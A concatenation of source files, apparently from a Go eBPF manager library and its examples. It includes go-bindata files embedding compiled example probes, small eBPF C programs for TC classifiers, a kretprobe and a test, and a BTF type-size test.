"\xa5\x16\xce\xdd\x59\x58\x1f\x07\xc6\xe6\x0a\xd1\x94\xca\xba\xee\x8d\xb8\x98\x6c\x64\x67\x10\x73\x11\x04\x41\x10" +
"\x1b\x6d\xac\x4f\x7f\x45\x4a\xff\x82\x3f\xe1\x4a\x41\x8b\x08\x82\x56\xae\xcc\xdc\x9b\x64\x78\xd9\x25\x3e\x98\xcc" +
"\xcc\x37\xf3\xbd\xf7\xbd\x2f\xc3\xbe\xba\x75\xd8\xaf\x09\x01\x1f\x02\xbf\xb1\xdc\x2d\xe3\x53\x6d\xb9\xde\xa7\xdf" +
"\x2d\x08\xcc\x04\x60\xae\x5d\x40\xd2\xf9\x53\x58\x74\x5b\x00\x79\x9c\x28\xbb\x7e\x36\x4e\xb3\x69\x67\xbe\xc0\x55" +
"\x66\x1c\x9e\xf7\xae\x9a\x69\xe7\xdb\x02\x1f\x3d\x3d\x4a\x1d\x1e\x9b\xde\xb4\x73\xea\xf0\x2f\x9f\xcf\x6a\x6d\x08" +
"\xe0\xb4\x28\x8a\x59\x0d\xe8\x02\x78\x03\xa0\x09\x60\x46\x5a\x3e\x32\x9d\x36\x97\xcd\x63\x6b\xd9\x3a\x56\x8b\xd5" +
"\x61\x35\xde\xbe\x73\x88\xbf\x45\x51\x9c\x7c\x17\xd8\x66\x3c\xd7\x73\x78\xd0\x08\x46\x0b\x40\xfb\x0c\x6e\xfb\xfb" +
"\xc7\x77\xd1\x7a\xb9\x29\xb6\x6c\x0f\x34\x7c\xbc\x2d\xf1\x8f\x87\x76\xa9\x7f\x16\x65\x67\x75\xd4\x57\xb0\xfb\x00" +
"\x2e\xe1\xdc\x62\xdf\xa0\xf9\x9e\xc3\x9b\x2b\xb8\xd5\x79\x39\xc8\xe3\x35\x75\x83\x7e\xdd\x5f\x2a\x8d\x7a\x61\x20" +
"\x0f\x06\x7d\x69\x17\x4b\xc3\x22\x3d\xd1\x91\xb3\x31\x22\x53\x83\xc3\x1d\x3d\xd1\x49\x3c\x1c\xea\x9d\xd5\x5b\xd1" +
"\x73\x95\xeb\x74\x9c\x21\x1a\xa6\x89\xca\xb4\x82\xcc\xd5\x50\xaa\x27\xd1\xe3\x3c\x1e\x29\x8c\xe2\x34\x93\x09\xa4" +
"\x36\xb9\x89\x1f\x41\xea\xc9\xc8\xcd\x07\x83\x3e\x64\x3e\x3e\x8a\x4d\x6c\xcf\xf6\xe4\xde\xcd\xff\x30\x72\x4d\x1c" +
"\x3b\x3f\x4b\x82\xde\xf3\x09\x83\xf9\xdb\x17\x34\x9a\x0c\xdf\xaf\xa8\xd7\x60\xfb\xeb\x6b\xf8\xfc\xad\xb4\xd8\xfe" +
"\x3d\xf1\x6f\x30\xfc\x2b\xcd\x5d\x86\xb7\x59\x1f\x0f\x68\xcd\x3d\xf8\x51\xa1\x97\xf7\x3f\xa8\xe0\xcf\x2b\xf8\x7c" +
"\xff\xae\x24\xa7\x8d\x5f\x34\x5f\x59\x53\x7f\xa3\x82\x7f\x91\xc0\xde\x1a\x7e\x1a\xbe\xf5\x20\x76\xe9\xe2\x2e\xc3" +
"\xb9\xff\xf6\x83\x75\xbe\xa4\xfe\x9c\xf8\xde\xef\x4d\xba\xe7\xf9\x1e\x7f\x5d\x52\xdb\xc6\x43\xe2\x7f\x08\x74\xd7" +
"\x03\xbe\xff\x9e\xfc\x0b\x00\x00\xff\xff\x83\x97\x90\xc4\xa0\x05\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 1440,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594295152, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>manager/examples/programs/kprobe/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\x94\x55\xbf\x6b\x14\x4f\x14\xff\xec\x5d\x7e\xdc\xf7\xbe\xc1\x44\xab\xb8" +
"\xa4\x58\x84\x40\xd2\x6c\x12\x09\x92\xc2\x22\x04\x12\x9b\x14\x22\x51\xec\x96\xcd\x65\x42\x96\xbd\xdd\x3d\x76\x27" +
"\x21\xf1\x04\xb5\xb0\xd0\x52\xd0\x56\xad\x2c\xb5\x3b\x0b\xc1\x7f\xc0\x22\x65\xc0\x26\x65\xc0\x26\x82\xa0\x85\x64" +
"\xe5\xcd\xcd\xe4\xe6\xe6\x6e\xbd\xf8\x60\x6f\xde\xfb\xcc\x7c\xde\xcf\xd9\xbd\x47\xab\xeb\x6b\x25\xcb\x82\x12\x0b" +
"\x3f\xd1\xb1\x3a\x72\x32\xd4\xd1\x97\xe5\xef\x38\x2c\x4c\x5a\x40\x23\x09\x62\x42\xf8\x6c\x15\x4d\xfb\x34\x27\x9d" +
"\xf0\xed\xcc\xd9\x21\x3d\x49\x42\xa7\x69\x9f\x9c\xe3\x51\xb8\x15\x90\x9e\x3a\x33\x7b\x4d\xfb\x58\xe0\x9f\xdf\xb6" +
"\x7d\x8f\x5a\xc0\x71\x9e\xe7\xad\x12\x30\x09\xe0\x29\x80\x11\x00\x2d\x19\xfb\xa5\x5c\x5b\x16\x10\x57\x81\xd0\xfe" +
"\x9d\x2b\x3b\x89\xa2\xa4\x66\xff\x3a\x8f\xb3\xcb\x83\x88\x74\x96\x79\x35\x95\x57\x4b\x16\x97\xd9\x67\x3d\x71\x4f" +
"\x65\xdc\xf1\x41\x71\xf9\x6c\xb5\xa6\xd5\xb9\x93\x24\x21\xe9\x4e\x23\x09\xf4\x3a\xb3\x83\xac\x46\xba\x5f\xaf\x3b" +
"\xaa\x4e\xc2\x53\xc6\x77\x45\xfd\xb1\x33\xd3\xb4\x8f\x7a\xfb\xe2\x73\xa7\x69\x1f\x1a\xf9\xfe\xe8\xc9\xf7\x50\xe6" +
"\x3b\xfd\x97\x7c\xc9\x27\xf5\x99\x66\x41\x73\xa0\x59\xd1\x9c\xa0\xef\xfb\xdc\xa1\x9c\x28\x1f\xca\x99\xf2\xed\x3a" +
"\x4c\x8d\xa4\x26\x52\x83\xe3\x2a\x6e\xdd\x5e\xc7\x59\x9e\xe7\xaf\xbf\x59\x62\x46\xba\x88\x74\xf5\x8d\x21\xed\xa9" +
"\x00\x98\x68\xc3\x13\xea\xfc\x83\x3b\xa8\x3c\xfc\xdf\x1a\x43\x7b\xde\xba\xbf\x7d\x4d\x9f\x02\xb0\x58\xb0\xa7\xf6" +
"\x37\x34\xfb\x03\x2e\x26\x6f\x44\x6a\xdf\xf3\x7e\x7b\x65\x94\xfb\x72\xca\x18\x2a\xc0\x87\x7b\xb0\x67\x00\x2e\x8b" +
"\xc2\xdb\xa2\x98\x8f\x05\xfe\x5f\x0f\x7e\x0f\xc0\x15\xcd\xbf\xaa\x73\x51\xe0\xe5\x1e\xfc\x9a\xc0\x3b\x71\x55\xdd" +
"\x53\x72\xa5\x79\x94\x00\x2c\x69\x36\x79\xb9\xaf\xd9\x22\x9a\xcb\xd9\x3e\x87\xbb\xb2\xb1\xe6\x92\x12\xa6\x8c\x37" +
"\xd2\x64\x93\xcd\xc9\x1b\xd2\x46\x92\x4d\xe6\xed\xc6\xf5\x20\x0e\x09\x11\x07\xbc\xbd\xed\xcc\x13\x87\x24\x30\x67" +
"\x02\x5e\xd7\xfd\x51\xa7\xba\x41\x6f\x8f\xa5\x59\x40\x4a\x3d\xa8\xb1\x38\x63\x70\x53\x56\x77\xd9\x8e\xb7\x9d\xfa" +
"\x11\x43\xe4\x07\xb1\x5b\x83\x9b\xf1\x94\xfb\x9b\x70\xb3\x83\x48\xac\x2b\x1b\x6b\x70\xd3\x64\xcb\xe7\x3e\xed\x2d" +
"\xb8\x0b\x37\x0c\xbb\xef\xa8\xfe\x59\xde\xc9\xbe\x99\x52\x91\xa3\xfa\x6a\xe0\xe6\x37\xd4\x92\xcf\x88\x81\x2f\x17" +
"\xc4\x33\x6f\xd8\xea\x00\xbe\xf9\x3e\x54\x0c\x3b\x2c\xe0\x7f\xbc\x20\x7f\xa2\x80\x3f\x2f\x0b\x35\xdf\x37\x93\xff" +
"\x49\xf2\xaf\x1b\xf8\xb1\xe4\xaf\xf6\x89\x07\xad\x8f\x5f\x0a\xf8\xd3\xa5\xf6\x3a\x6e\xe0\x96\xb1\x3e\xd7\xee\xbe" +
"\x2e\x8b\x92\x6f\xf6\xdb\x9c\xdf\x93\x02\xfe\x52\x01\xdf\xb4\x5b\x7d\x7c\x92\xdc\x94\xfc\xab\x03\xe2\x8f\x16\xf0" +
"\xef\x4a\xbe\x33\x80\xff\x4a\xfb\x16\xe8\xb2\x2f\x81\x86\x81\x9b\xf3\x7b\x01\x68\x5f\xab\x8e\x1c\xc9\x86\xcc\x4b" +
"\xfb\x12\x80\x31\x8d\xaf\xe6\xf8\xbe\x4f\x6c\x92\x13\x09\x9e\x6a\x79\x0f\x6b\x7c\xf5\x7f\xf0\x27\x00\x00\xff\xff" +
"\x66\x31\x61\xca\xa8\x08\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 2216,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594312574, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>manager/examples/programs/tc/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_helpers.h"
#include <uapi/linux/pkt_cls.h>
SEC("classifier/egress")
int egress_cls_func(struct __sk_buff *skb)
{
bpf_printk("new packet captured on egress (TC)\n");
return TC_ACT_OK;
};
SEC("classifier/ingress")
int ingress_cls_func(struct __sk_buff *skb)
{
bpf_printk("new packet captured on ingress (TC)\n");
return TC_ACT_OK;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/tests_and_benchmarks/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_map.h"
#include "include/bpf_helpers.h"
__attribute__((always_inline)) static int my_func(u32 input)
{
return 2*input;
}
#define TEST_DATA_KEY 1
struct my_func_test_data_t {
u32 input;
u32 output;
};
struct bpf_map_def SEC("maps/my_func_test_data") my_func_test_data = {
.type = BPF_MAP_TYPE_ARRAY,
.key_size = sizeof(u32),
.value_size = sizeof(struct my_func_test_data_t),
.max_entries = 2,
};
SEC("xdp/my_func_test")
int my_func_test(struct __sk_buff *skb)
{
// Retrieve test data
u32 key = TEST_DATA_KEY;
struct my_func_test_data_t *data = bpf_map_lookup_elem(&my_func_test_data, &key);
if (data == NULL) {
bpf_printk("no test data\n");
return -1;
}
u32 ret = my_func(data->input);
if (ret != data->output) {
bpf_printk("expected %d for input %d, got %d\n", data->output, data->input, ret);
return -1;
}
return 0;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>internal/btf/types_test.go<|end_filename|>
package btf
import "testing"
import "fmt"
func TestSizeof(t *testing.T) {
testcases := []struct {
size int
typ Type
}{
{1, &Int{Size: 1}},
{4, &Enum{}},
{0, &Array{Type: &Pointer{Target: Void{}}, Nelems: 0}},
{12, &Array{Type: &Enum{}, Nelems: 3}},
}
for _, tc := range testcases {
name := fmt.Sprint(tc.typ)
t.Run(name, func(t *testing.T) {
have, err := Sizeof(tc.typ)
if err != nil {
t.Fatal("Can't calculate size:", err)
}
if have != tc.size {
t.Errorf("Expected size %d, got %d", tc.size, have)
}
})
}
}
func TestCopyType(t *testing.T) {
_ = copyType(Void{})
in := &Int{Size: 4}
out := copyType(in)
in.Size = 8
if size := out.(*Int).Size; size != 4 {
t.Error("Copy doesn't make a copy, expected size 4, got", size)
}
t.Run("cyclical", func(t *testing.T) {
ptr := &Pointer{}
foo := &Struct{
Members: []Member{
{Type: ptr},
},
}
ptr.Target = foo
_ = copyType(foo)
})
}
// The following are valid Types.
//
// There currently is no better way to document which
// types implement an interface.
func ExampleType_validTypes() {
var t Type
t = &Void{}
t = &Int{}
t = &Pointer{}
t = &Array{}
t = &Struct{}
t = &Union{}
t = &Enum{}
t = &Fwd{}
t = &Typedef{}
t = &Volatile{}
t = &Const{}
t = &Restrict{}
t = &Func{}
t = &FuncProto{}
t = &Var{}
t = &Datasec{}
_ = t
}
<|start_filename|>manager/examples/programs/xdp/utils.go<|end_filename|>
package main
import (
"bytes"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
"io"
"net/http"
)
// recoverAssets - Recover ebpf asset
func recoverAssets() io.ReaderAt {
buf, err := Asset("/probe.o")
if err != nil {
logrus.Fatal(errors.Wrap(err, "couldn't find asset"))
}
return bytes.NewReader(buf)
}
// trigger - Generate some network traffic to trigger the probe
func trigger() {
logrus.Println("Generating some network traffic to trigger the probes ...")
_, _ = http.Get("https://www.google.com/")
}
<|start_filename|>manager/examples/mapspec_editor/main.go<|end_filename|>
package main
import (
"github.com/sirupsen/logrus"
"golang.org/x/sys/unix"
"math"
"github.com/DataDog/ebpf"
"github.com/DataDog/ebpf/manager"
)
var m = &manager.Manager{}
func main() {
options := manager.Options{
MapSpecEditors: map[string]manager.MapSpecEditor{
"cache": manager.MapSpecEditor{
Type: ebpf.LRUHash,
MaxEntries: 1000000,
EditorFlag: manager.EditMaxEntries | manager.EditType,
},
},
RLimit: &unix.Rlimit{
Cur: math.MaxUint64,
Max: math.MaxUint64,
},
}
// Initialize the manager
if err := m.InitWithOptions(recoverAssets(), options); err != nil {
logrus.Fatal(err)
}
logrus.Println("successfully loaded, checkout the parameters of the map \"cache\" using bpftool")
wait()
// Close the manager
if err := m.Stop(manager.CleanAll); err != nil {
logrus.Fatal(err)
}
}
<|start_filename|>manager/examples/map_rewrite_vs_map_router/ebpf/prog1.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_map.h"
#include "include/bpf_helpers.h"
// shared_cache1 - This map will be shared with another Manager
struct bpf_map_def SEC("maps/shared_cache1") shared_cache1 = {
.type = BPF_MAP_TYPE_HASH,
.key_size = sizeof(u32),
.value_size = sizeof(u32),
.max_entries = 10,
};
// shared_cache2 - This map will be shared with another Manager
struct bpf_map_def SEC("maps/shared_cache2") shared_cache2 = {
.type = BPF_MAP_TYPE_HASH,
.key_size = sizeof(u32),
.value_size = sizeof(u32),
.max_entries = 10,
};
SEC("kretprobe/vfs_mkdir")
int kretprobe_vfs_mkdir(void *ctx)
{
// retrieve the value saved in the cache at key 1
u32 key = 1;
u32 *value = bpf_map_lookup_elem(&shared_cache1, &key);
if (!value) {
bpf_printk("(prog1) shared_cache1 is empty\n");
} else {
bpf_printk("(prog1) shared_cache1 contains %u\n", *value);
}
value = bpf_map_lookup_elem(&shared_cache2, &key);
if (!value) {
bpf_printk("(prog1) shared_cache2 is empty\n");
} else {
bpf_printk("(prog1) shared_cache2 contains %u\n", *value);
}
return 0;
}
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/mapspec_editor/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_map.h"
#include "include/bpf_helpers.h"
struct bpf_map_def SEC("maps/cache") cache = {
.type = BPF_MAP_TYPE_HASH,
.key_size = sizeof(u32),
.value_size = sizeof(u32),
.max_entries = 10,
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/object_pinning/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
		return nil, clErr
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\xec\x57\x4f\x68\x1c\x55\x18\xff\x66\xb2\xdb\xcd\x6e\x6b\xdc\x4a\x8a\xe9" +
"\xb2\x87\x87\x21\x60\x8b\x4e\xb2\x9b\x2a\x1e\x43\xc0\xf4\x60\x0e\x45\x22\x88\x97\x75\xba\x33\x36\x63\x32\xb3\xcb" +
"\xcc\xa0\x8d\x2b\xe8\x45\x10\x3c\xd8\x8b\x37\xc5\xaa\xd4\xa3\x88\x08\x7b\x11\x1a\xf0\x52\xf0\x12\xd0\x43\x8f\x3d" +
"\x16\x54\xac\x1e\xb4\x87\xe8\xc8\xf7\xfe\xcc\xbe\x7d\xf3\x5e\x93\xec\xad\x34\x0f\x26\x33\xdf\xef\x7d\xdf\xfb\x7d" +
"\xef\x7b\xdf\xf7\xbd\xcd\x7b\x2f\xae\xaf\xd9\x96\x05\x62\x58\xf0\x0f\x8c\xa4\xd1\xf8\xf0\xf1\xd1\xf7\x0a\xff\x7b" +
"\x06\x2c\x18\x5a\x40\xf5\xbb\x8d\xfd\x0c\xd1\x9b\x5f\x32\x9d\x8a\x0d\xb0\x9f\x65\xd9\x9c\xb2\xd8\x07\xc0\xf4\x5f" +
"\x81\xd3\x54\x46\xfb\x1a\x00\x6c\x35\xee\x52\x7b\xd4\x0f\x12\xe2\xe3\x77\xd8\x4f\x77\x06\x8d\x3b\x39\xee\x9d\x23" +
"\x21\x7e\xbb\xfd\x16\x19\x34\x6e\xe7\xf8\xd3\xe1\x96\x87\xdf\x41\x4c\x16\x06\x8d\x3d\xe6\xc7\x17\xdc\x0f\x0b\x60" +
"\x2f\xcb\xb2\xa1\x0d\xd0\x40\xbe\x29\xc6\x8f\x7e\x9c\x00\x80\x32\x3c\x99\xfb\x81\x23\x69\xfc\x95\x09\xd9\xab\xa1" +
"\x5f\xf7\x72\x1e\xb2\xe0\x11\xca\x9f\x22\xcf\xc8\xdf\x6e\x2f\x4a\x29\x1e\x44\xc9\xa4\xfe\xba\x25\xc6\xef\xde\xd8" +
"\x37\xfa\x3f\xaf\xf1\x7f\xc8\xe3\xfa\x09\x7f\x3f\x8c\xe7\x61\x3f\xe4\xe7\x61\x1f\xe1\x3c\x50\x3e\x4f\xe5\xfb\x47" +
"\x3c\x9f\xf9\x7c\x3d\xb7\xdf\xaa\x75\xa5\xfd\x8a\x38\x04\x11\x09\xe5\xfd\x46\x57\xc8\x02\x7e\x7b\xc4\x4d\xe5\xfd" +
"\x92\x20\x4a\xf0\xdb\x8f\xd3\x40\xec\x97\xe2\xb1\x4f\xe3\x46\x16\xbc\x73\x83\xc6\x2d\x4d\x7c\x70\x9d\xdd\x6c\xfc" +
"\x7c\x7e\xcb\x4c\x71\xda\xe5\x71\x7a\x56\xca\xdb\x61\x89\xed\x5f\xc4\x4b\xdd\xff\xcd\xaf\xb8\x3c\x05\x70\x5f\x13" +
"\x8f\x61\x69\x14\x17\x9b\xe6\xcb\xd9\x3c\x2e\x5e\xaf\x06\x5d\x29\x3f\x36\x83\xe8\x0a\xdd\x4f\xda\x23\x72\x7e\xf8" +
"\xb1\xff\x0c\xc5\xa3\x5e\x2a\xc7\x2b\xf6\x5d\xba\xcf\x1d\x92\x6e\x8e\xc5\xcb\x73\x59\x3e\x11\x77\x7b\xd2\x78\xe9" +
"\xe2\x72\x61\x82\x7a\x7e\x94\xf3\xc7\x3e\xce\x1f\x6d\xfe\x3c\xa8\xff\xe0\xf6\x4b\xfc\xa9\xc1\xf1\x90\xc7\x71\x6c" +
"\xcc\xe3\xe2\xa5\x75\xf8\x2f\xcb\x32\xcc\x45\xbc\x17\xf1\xee\xc4\x7b\x13\x7f\x0b\xe0\xef\x00\x11\x2f\x75\x1e\xef" +
"\x5e\xbc\x77\xb1\xa7\xe0\xbd\xec\x29\x81\x65\xfa\x6e\x8a\xb9\x4f\xad\x82\x28\xc1\x3e\x82\xbd\x86\x5b\x10\xec\x43" +
"\xd8\xa3\xb4\xfa\x9e\x9b\x62\x1d\x61\xad\x61\x9d\x61\x2d\x62\x1d\x62\xad\x62\x9d\x62\x0d\x7f\xfe\xab\x05\x73\xca" +
"\x7e\x68\x1b\x90\x27\x4a\xd2\x33\x0d\x00\x75\x06\xd7\x85\xfe\x3b\x2f\xc3\xf4\xbb\x27\xad\x53\x58\x93\xfc\x11\xe3" +
"\x9a\xd4\x53\x9a\xc0\xea\x50\x37\x27\xe6\x37\x24\x79\xc5\x2e\xce\xa7\x0f\x98\x37\x8d\x1f\xa8\xeb\x7f\x66\x2a\x3e" +
